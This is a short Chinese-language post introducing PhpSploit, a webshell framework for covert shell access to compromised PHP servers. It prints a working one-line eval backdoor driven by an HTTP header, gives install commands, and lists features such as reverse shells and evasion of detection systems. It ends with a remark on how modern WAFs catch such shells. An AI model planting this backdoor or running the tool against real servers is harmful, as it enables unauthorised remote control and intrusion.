PhpSploit – 交互式shell后门控制工具

PhpSploit

Phpsploit 是一个远程控制框架,通过 HTTP 在客户机和 web 服务器之间提供隐蔽的交互式 shell 连接,能够为权限提升等目访问网络服务器。我们可理解为它是一款单webshell管理工具

PhpSploit - 交互式shell后门控制工具

混淆通信是通过标准客户端请求下的 HTTP 头和 web 服务器的相对响应来完成的,通过一个一句话后门隧道:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

PhpSploit安装

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

PhpSploit功能

  • 高效: 超过20个插件可自动执行任务
    • 运行命令和浏览文件系统,绕过 PHP 安全限制
    • 在客户端和目标之间上传 / 下载文件
    • 通过本地文本编辑器编辑远程文件
    • 在目标系统上运行 SQL 控制台
    • 产生反向 TCP shell
  • 隐形: 框架是由偏执狂为偏执狂而制造的
    • 通过日志分析和 NIDS 特征检测几乎不可见
    • 安全模式和通用模式绕过 PHP 安全限制
    • 通信隐藏在 HTTP header 中
    • 加载的有效载荷被模糊化为bypass NIDS 旁路 NIDS
    • http/https/socks4/socks5 Proxy support
  • 方便: 一个具有许多关键特性的健壮的界面
    • 任何命令或选项的详细帮助(类型help)
    • 跨平台 在客户端和服务器上都有
    • 强大的界面与完成和多命令支持
    • 会话保存 / 加载特性 & 持久历史记录
    • 对大型有效负载(如上传)的多请求支持
    • 提供强大的、高度可配置的设置引擎
    • 每个设置,例如 user-agent 都有一个polymorphic mode 多态模式
    • 用于插件交互的可定制环境变量
    • 提供了一个完整的插件开发 API

点评

如果这个工具放在2017年左右相对来说比较有效,因为各家waf还相对较弱。以国内来说,WAF拦截学习力在不断提升,现在随着静态样式特征+动态AI学习的结合,普通的变体已经很难存活。最新的技术可看看动态二进制加密实现新型一句话木马/蚁剑AntSword